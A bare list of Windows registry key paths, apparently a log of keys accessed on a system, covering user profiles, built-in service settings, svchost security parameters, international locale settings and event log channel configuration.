HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityParam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\ImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityAppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DeferredCoInitializeSecurityServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\SystemCritical
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialUserCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumUserCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\Application Popup\ProviderGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ClockType
